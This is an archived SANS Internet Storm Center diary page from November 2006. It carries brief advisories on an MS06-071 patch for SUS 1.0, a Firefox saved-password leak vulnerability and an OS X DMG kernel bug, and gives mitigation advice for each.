Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-11-22 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

MS06-071 is available via SUS 1.0

Published: 2006-11-22
Last Updated: 2006-11-22 19:47:38 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)
The MS06-071 patch should now be available on SUS 1.0 servers for approval. Reader Andrew reports having seen MSXML 4.0 SP2 Security Update (KB927978), 11/17/2006 and MSXML 6.0 RTM Security Update (KB927977), 11/17/2006 show up. The Microsoft Security Response Center Blog made the announcement here.
Microsoft have also announced that support for SUS 1.0 will be further extended until Patch Tuesday July 10, 2007. The announcement appears on the main SUS page. MS06-071 not being available for SUS 1.0 when it was released was also discussed on the Microsoft blog, as well as the SUS drop dead date extension.

Cheers,
Adrien de Beaupre
Keywords:
0 comment(s)

Reverse Cross-Site Request (RCSR) vulnerability

Published: 2006-11-22
Last Updated: 2006-11-22 14:43:18 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)
A new vulnerability in Firefox has been recently disclosed. The password saving functionality of Firefox can be exploited to expose usernames and passwords to other sites, such as those used for blogs or any page requesting user input. The proof of concept page shows the username and password input in a google URL. They are calling it a Reverse Cross-Site Request (RCSR) vulnerability. The advisory appears here. This type of attack vector appears to also affect Internet Explorer.

Bugzilla link.

Mozilla has apparently been advised of the vulnerability, there currently is no vendor patch. The workaround in this particular case would be to never use Firefox to save passwords for any web site. The option is under Tools, Options, Security. Here is a link showing how to disable it.

Thanks to our reader Carsten for letting us know.

Cheers,
Adrien de Beaupre
Keywords:
0 comment(s)

Mac OS X Apple UDIF Disk Image Kernel Memory Corruption

Published: 2006-11-22
Last Updated: 2006-11-22 03:57:39 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)
A vulnerability has been reported in the way OS X handles corrupt DMG images. This would typically be a local user exploit for privilege escalation. The exception here would be that it could also be exploited remotely via the Safari web browser. A lot of  OS X binaries can arrive as DMG files. They are complete file systems, and are automounted in a default configuration. A corrupted DMG file would then compromise the system and allow for arbitrary code execution. This new vulnerability and the PoC is brought to you by the Month of Kernel Bugs (MoKB) and the number 10.

Mitigation: There currently is no vendor patch for this vulnerability. To reduce the risk of remote compromise reconfigure Safari and be careful with DMG files from untrusted or unknown sources. For Safari disable opening "safe" files after downloading. Tutorial on how and why to do so can be found here.

Secunia advisory can be found here

Cheers,
Adrien de Beaupre

Keywords:
0 comment(s)
Diary Archives